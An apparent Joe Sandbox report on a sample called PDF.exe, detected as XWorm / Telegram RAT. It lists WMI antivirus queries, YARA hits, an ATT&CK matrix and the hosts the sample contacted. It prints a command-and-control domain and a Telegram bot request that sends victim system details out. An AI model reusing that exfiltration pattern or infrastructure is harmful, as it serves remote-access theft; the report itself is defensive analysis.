                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeQueries volume information: C:\Users\user\AppData\Local\Temp\XClient.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\XClient.exeQueries volume information: C:\Users\user\AppData\Local\Temp\XClient.exe VolumeInformation
                                    Source: C:\Users\user\Desktop\PDF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                    Source: PDF.exe, 00000000.00000002.2931983795.000000001B77D000.00000004.00000020.00020000.00000000.sdmp, PDF.exe, 00000000.00000002.2937702885.000000001C5CA000.00000004.00000020.00020000.00000000.sdmp, PDF.exe, 00000000.00000002.2931983795.000000001B710000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                                    Source: C:\Users\user\Desktop\PDF.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                                    Source: C:\Users\user\Desktop\PDF.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                                    Source: C:\Users\user\Desktop\PDF.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                                    Source: C:\Users\user\Desktop\PDF.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                                    Source: C:\Users\user\Desktop\PDF.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                                    Source: C:\Users\user\Desktop\PDF.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                                    Source: C:\Users\user\Desktop\PDF.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                                    Source: C:\Users\user\Desktop\PDF.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                                    Source: C:\Users\user\Desktop\PDF.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                                    Source: C:\Users\user\Desktop\PDF.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                                    Source: C:\Users\user\Desktop\PDF.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                                    Source: C:\Users\user\Desktop\PDF.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                                    Source: C:\Users\user\Desktop\PDF.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                                    Source: C:\Users\user\Desktop\PDF.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                                    Source: C:\Users\user\Desktop\PDF.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                                    Source: C:\Users\user\Desktop\PDF.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                                    Source: C:\Users\user\Desktop\PDF.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                                    Source: C:\Users\user\Desktop\PDF.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                                    Source: C:\Users\user\Desktop\PDF.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                                    Source: C:\Users\user\Desktop\PDF.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                                    Stealing of Sensitive Information

                                    barindex
                                    Yara detected Telegram RAT
                                    Source: Yara matchFile source: PDF.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.0.PDF.exe.640000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.2.PDF.exe.128e1a78.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.2.PDF.exe.128e1a78.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000000.00000000.1639412342.0000000000642000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000002.2928719557.00000000128D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: PDF.exe PID: 732, type: MEMORYSTR
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED
                                    Yara detected XWorm
                                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                                    Source: Yara matchFile source: PDF.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.0.PDF.exe.640000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.2.PDF.exe.128e1a78.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.2.PDF.exe.128e1a78.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000000.00000002.2898462305.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000000.1639412342.0000000000642000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000002.2928719557.00000000128D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: PDF.exe PID: 732, type: MEMORYSTR
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED

                                    Remote Access Functionality

                                    barindex
                                    Yara detected Telegram RAT
                                    Source: Yara matchFile source: PDF.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.0.PDF.exe.640000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.2.PDF.exe.128e1a78.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.2.PDF.exe.128e1a78.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000000.00000000.1639412342.0000000000642000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000002.2928719557.00000000128D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: PDF.exe PID: 732, type: MEMORYSTR
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED
                                    Yara detected XWorm
                                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                                    Source: Yara matchFile source: PDF.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.0.PDF.exe.640000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.2.PDF.exe.128e1a78.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.2.PDF.exe.128e1a78.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000000.00000002.2898462305.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000000.1639412342.0000000000642000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000002.2928719557.00000000128D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: PDF.exe PID: 732, type: MEMORYSTR
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED

                                    Mitre Att&ck Matrix

                                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                                    Windows Management Instrumentation                                    		1
                                    DLL Side-Loading                                    		1
                                    DLL Side-Loading                                    		11
                                    Disable or Modify Tools                                    		1
                                    Input Capture                                    		1
                                    File and Directory Discovery                                    		Remote Services11
                                    Archive Collected Data                                    		1
                                    Web Service                                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                                    CredentialsDomainsDefault Accounts1
                                    PowerShell                                    		1
                                    Registry Run Keys / Startup Folder                                    		12
                                    Process Injection                                    		1
                                    Deobfuscate/Decode Files or Information                                    		LSASS Memory23
                                    System Information Discovery                                    		Remote Desktop Protocol1
                                    Input Capture                                    		3
                                    Ingress Tool Transfer                                    		Exfiltration Over BluetoothNetwork Denial of Service
                                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                                    Registry Run Keys / Startup Folder                                    		1
                                    Obfuscated Files or Information                                    		Security Account Manager541
                                    Security Software Discovery                                    		SMB/Windows Admin Shares1
                                    Clipboard Data                                    		11
                                    Encrypted Channel                                    		Automated ExfiltrationData Encrypted for Impact
                                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                                    Software Packing                                    		NTDS2
                                    Process Discovery                                    		Distributed Component Object ModelInput Capture1
                                    Non-Standard Port                                    		Traffic DuplicationData Destruction
                                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                                    DLL Side-Loading                                    		LSA Secrets151
                                    Virtualization/Sandbox Evasion                                    		SSHKeylogging3
                                    Non-Application Layer Protocol                                    		Scheduled TransferData Encrypted for Impact
                                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                                    Masquerading                                    		Cached Domain Credentials1
                                    Application Window Discovery                                    		VNCGUI Input Capture14
                                    Application Layer Protocol                                    		Data Transfer Size LimitsService Stop
                                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items151
                                    Virtualization/Sandbox Evasion                                    		DCSync1
                                    System Network Configuration Discovery                                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                                    Process Injection                                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                                    Behavior Graph

                                    Hide Legend

                                    Legend:

                                    • Process
                                    • Signature
                                    • Created File
                                    • DNS/IP Info
                                    • Is Dropped
                                    • Is Windows Process
                                    • Number of created Registry Values
                                    • Number of created Files
                                    • Visual Basic
                                    • Delphi
                                    • Java
                                    • .Net C# or VB.NET
                                    • C, C++ or other language
                                    • Is malicious
                                    • Internet
                                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1502471 Sample: PDF.exe Startdate: 01/09/2024 Architecture: WINDOWS Score: 100 36 api.telegram.org 2->36 38 tr3.localto.net 2->38 40 ip-api.com 2->40 50 Multi AV Scanner detection for domain / URL 2->50 52 Suricata IDS alerts for network traffic 2->52 54 Found malware configuration 2->54 58 22 other signatures 2->58 8 PDF.exe 15 5 2->8         started        13 XClient.exe 2->13         started        15 XClient.exe 2->15         started        signatures3 56 Uses the Telegram API (likely for C&C communication) 36->56 process4 dnsIp5 42 ip-api.com 208.95.112.1, 49730, 80 TUT-ASUS United States 8->42 44 api.telegram.org 149.154.167.220, 443, 64986 TELEGRAMRU United Kingdom 8->44 46 tr3.localto.net 185.141.35.22, 6475, 64988, 64989 AS43260TR Turkey 8->46 34 C:\Users\user\AppData\Local\...\XClient.exe, PE32 8->34 dropped 60 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->60 62 Protects its processes via BreakOnTermination flag 8->62 64 Bypasses PowerShell execution policy 8->64 72 3 other signatures 8->72 17 powershell.exe 23 8->17         started        20 powershell.exe 23 8->20         started        22 powershell.exe 23 8->22         started        24 powershell.exe 8->24         started        66 Antivirus detection for dropped file 13->66 68 Multi AV Scanner detection for dropped file 13->68 70 Machine Learning detection for dropped file 13->70 file6 signatures7 process8 signatures9 48 Loading BitLocker PowerShell Module 17->48 26 conhost.exe 17->26         started        28 conhost.exe 20->28         started        30 conhost.exe 22->30         started        32 conhost.exe 24->32         started        process10

                                    Screenshots

                                    Thumbnails

                                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                    windows-stand

                                    Antivirus, Machine Learning and Genetic Malware Detection

                                    Initial Sample

                                    SourceDetectionScannerLabelLink
                                    PDF.exe87%ReversingLabsByteCode-MSIL.Backdoor.XWorm
                                    PDF.exe81%VirustotalBrowse
                                    PDF.exe100%AviraTR/Spy.Gen
                                    PDF.exe100%Joe Sandbox ML

                                    Dropped Files

                                    SourceDetectionScannerLabelLink
                                    C:\Users\user\AppData\Local\Temp\XClient.exe100%AviraTR/Spy.Gen
                                    C:\Users\user\AppData\Local\Temp\XClient.exe100%Joe Sandbox ML
                                    C:\Users\user\AppData\Local\Temp\XClient.exe87%ReversingLabsByteCode-MSIL.Backdoor.XWorm
                                    C:\Users\user\AppData\Local\Temp\XClient.exe81%VirustotalBrowse

                                    Unpacked PE Files

                                    No Antivirus matches

                                    Domains

                                    SourceDetectionScannerLabelLink
                                    tr3.localto.net15%VirustotalBrowse
                                    ip-api.com0%VirustotalBrowse
                                    api.telegram.org2%VirustotalBrowse

                                    URLs

                                    SourceDetectionScannerLabelLink
                                    http://nuget.org/NuGet.exe0%URL Reputationsafe
                                    http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                                    http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                                    http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                                    https://contoso.com/0%URL Reputationsafe
                                    https://nuget.org/nuget.exe0%URL Reputationsafe
                                    https://contoso.com/License0%URL Reputationsafe
                                    https://contoso.com/Icon0%URL Reputationsafe
                                    https://aka.ms/pscore680%URL Reputationsafe
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                                    http://ip-api.com/line/?fields=hosting0%URL Reputationsafe
                                    http://go.microsoft.co0%Avira URL Cloudsafe
                                    tr3.localto.net100%Avira URL Cloudphishing
                                    https://api.telegram.org/bot0%Avira URL Cloudsafe
                                    http://crl.microso0%Avira URL Cloudsafe
                                    http://www.apache.org/licenses/LICENSE-2.0.html0%Avira URL Cloudsafe
                                    tr3.localto.net15%VirustotalBrowse
                                    https://api.telegram.org/botYour_Token/sendMessage?chat_id=Your_ID&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AB97C9347C020046B4843%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20PYW79587S%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.60%Avira URL Cloudsafe
                                    https://api.telegram.org/bot1%VirustotalBrowse
                                    http://go.microsoft.co1%VirustotalBrowse
                                    https://github.com/Pester/Pester1%VirustotalBrowse
                                    https://github.com/Pester/Pester0%Avira URL Cloudsafe
                                    http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse

                                    Domains and IPs

                                    Contacted Domains

                                    NameIPActiveMaliciousAntivirus DetectionReputation
                                    tr3.localto.net
                                    		185.141.35.22
                                    		truetrueunknown
                                    ip-api.com
                                    		208.95.112.1
                                    		truetrueunknown
                                    api.telegram.org
                                    		149.154.167.220
                                    		truetrueunknown

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    tr3.localto.nettrue
                                    • 15%, Virustotal, Browse
                                    • Avira URL Cloud: phishing
                                    		unknown
                                    https://api.telegram.org/botYour_Token/sendMessage?chat_id=Your_ID&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AB97C9347C020046B4843%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20PYW79587S%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://ip-api.com/line/?fields=hostingfalse
                                    • URL Reputation: safe
                                    		unknown

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    http://go.microsoft.copowershell.exe, 00000001.00000002.1742593525.0000011820420000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • 1%, Virustotal, Browse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1738813395.0000011818112000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1818443016.00000268F0072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1952383691.0000016710072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2154236852.000002BCB6C70000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000B.00000002.2025788163.000002BCA6E28000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://api.telegram.org/botPDF.exe, XClient.exe.0.drfalse
                                    • 1%, Virustotal, Browse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://crl.microsopowershell.exe, 00000004.00000002.1832436188.00000268F881B000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000001.00000002.1723565791.00000118082C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1768854127.00000268E0229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1864354266.0000016700229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2025788163.000002BCA6E28000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000B.00000002.2025788163.000002BCA6E28000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • 0%, Virustotal, Browse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000001.00000002.1723565791.00000118082C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1768854127.00000268E0229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1864354266.0000016700229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2025788163.000002BCA6E28000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://contoso.com/powershell.exe, 0000000B.00000002.2154236852.000002BCB6C70000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1738813395.0000011818112000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1818443016.00000268F0072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1952383691.0000016710072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2154236852.000002BCB6C70000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://contoso.com/Licensepowershell.exe, 0000000B.00000002.2154236852.000002BCB6C70000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://contoso.com/Iconpowershell.exe, 0000000B.00000002.2154236852.000002BCB6C70000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://aka.ms/pscore68powershell.exe, 00000001.00000002.1723565791.00000118080A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1768854127.00000268E0001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1864354266.0000016700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2025788163.000002BCA6C01000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePDF.exe, 00000000.00000002.2898462305.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1723565791.00000118080A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1768854127.00000268E0001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1864354266.0000016700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2025788163.000002BCA6C01000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://github.com/Pester/Pesterpowershell.exe, 0000000B.00000002.2025788163.000002BCA6E28000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • 1%, Virustotal, Browse
                                    • Avira URL Cloud: safe
                                    		unknown

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    208.95.112.1
                                    		ip-api.comUnited States
                                    		53334TUT-ASUStrue
                                    149.154.167.220
                                    		api.telegram.orgUnited Kingdom
                                    		62041TELEGRAMRUtrue
                                    185.141.35.22
                                    		tr3.localto.netTurkey
                                    		43260AS43260TRtrue

                                    General Information

                                    Joe Sandbox version:40.0.0 Tourmaline
                                    Analysis ID:1502471
                                    Start date and time:2024-09-01 18:13:06 +02:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 5m 53s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:17
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:PDF.exe
                                    Detection:MAL
                                    Classification:mal100.troj.spyw.evad.winEXE@15/20@3/3
                                    EGA Information:
                                    • Successful, ratio: 14.3%
                                    HCA Information:
                                    • Successful, ratio: 99%
                                    • Number of executed functions: 69
                                    • Number of non-executed functions: 7
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe

                                    Warnings

